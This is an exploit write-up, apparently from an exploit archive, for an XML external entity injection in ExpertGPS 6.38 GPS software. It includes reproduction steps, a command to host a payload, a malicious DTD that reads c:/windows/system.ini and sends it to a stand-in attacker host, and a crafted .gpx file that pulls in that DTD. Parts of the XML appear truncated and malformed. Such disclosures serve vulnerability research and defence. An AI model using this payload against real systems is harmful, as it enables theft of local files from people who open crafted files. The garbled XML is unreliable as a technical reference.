ExpertGPS 6.38 XML Injection

ExpertGPS version 6.38 suffers from an XML external entity injection vulnerability.

MD5 | 4e1090a6488fa7a932e6937630a5772a

[+] Exploit Title: ExpertGPS 6.38 - XML External Entity Injection
[+] Date: 2019-12-07
[+] Exploit Author: Trent Gordon
[+] Vendor Homepage:
[+] Software Link:
[+] Disclosed at: 7FEB2020
[+] Version: 6.38
[+] Tested on: Windows 10
[+] CVE: N/A

ExpertGPS 6.38 is GPS software, distributed by TopoGrafix, that is designed to sync with commercial off-the-shelf GPS devices (Garmin, Magellin, etc.) and organize GPS waypoint data. One of the main file formats for saving GPS data is the .gpx format which is based on XML.

By having a user import a crafted .gpx file (XML Based GPS data file), it is possible to execute a XXE injection which retrieves local files and exfiltrates them to a remote attacker.
1.)Open ExpertGPS.exe
2.)Select File -> Import Data from Other Programs...
3.)Select the crafted route.gpx file (with listener open on ATTACKERS-IP) and click "Open".

Proof of Concept:

a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting payload.dtd)

b.) Hosted "payload.dtd"

<?xml version="1.0" encoding="utf-8" ?>
<!ENTITY % data SYSTEM "file:///c:/windows/system.ini">
<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://ATTACKERS-IP?%data;'>">

c.) Exploited "route.xml"

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY % sp SYSTEM "http://ATTACKERS-IP:9999/payload.dtd">
<gpx xmlns="" version="1.1" creator="ExpertGPS 6.38 using Garmin Colorado 400t" xmlns:xsi="" xmlns:wptx1="" xmlns:gpxx="" xsi:schemaLocation="">
<bounds minlat="38.89767500" minlon="-77.03654700" maxlat="38.89767500" maxlon="-77.03654700"/>
<time xmlns="">2019-12-08T03:35:44.731Z</time>
<active_point xmlns="" lat="38.89767500" lon="-77.03654700">
<wpt lat="38.89767500" lon="-77.03654700">
<cmt>1600 Pennsylvania Avenue
<desc>1600 Pennsylvania Avenue
Washington, DC 20500</desc>
<sym>City (Small)</sym>
<label xmlns="">
<label_text>1600 Pennsylvania Avenue
Washington, DC 20500</label_text>
<gpxx:StreetAddress>1600 Pennsylvania Avenue</gpxx:StreetAddress>
<gpxx:Country>United States</gpxx:Country>
<wptx1:StreetAddress>1600 Pennsylvania Avenue</wptx1:StreetAddress>
<wptx1:Country>United States</wptx1:Country>

Additional Attack Vectors:
There are numerous places in the software that allow for importing/opening a .gpx file. I did not test them all, but I strongly suspect them to all rely upon the same misconfigured XML Parser, and therefore be vulnerable to XXE.

Related Posts